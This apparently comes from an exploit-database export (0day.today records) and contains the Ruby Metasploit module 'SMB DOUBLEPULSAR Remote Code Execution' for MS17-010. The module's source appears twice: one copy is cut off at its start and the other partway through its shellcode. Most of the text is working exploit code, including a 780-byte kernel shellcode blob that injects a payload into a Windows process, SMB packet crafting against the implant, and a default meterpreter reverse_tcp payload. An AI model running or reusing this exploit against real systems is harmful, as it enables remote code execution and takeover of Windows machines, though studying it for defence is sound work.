pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-17] #"}, "lastseen": "2021-10-16T22:15:48", "differentElements": ["sourceData"], "edition": 46}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "f8fb2b6e2ee8509bc76f47648a25e4a4", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-18T18:16:51", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-33313"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-18T18:16:51", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-18T18:16:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n 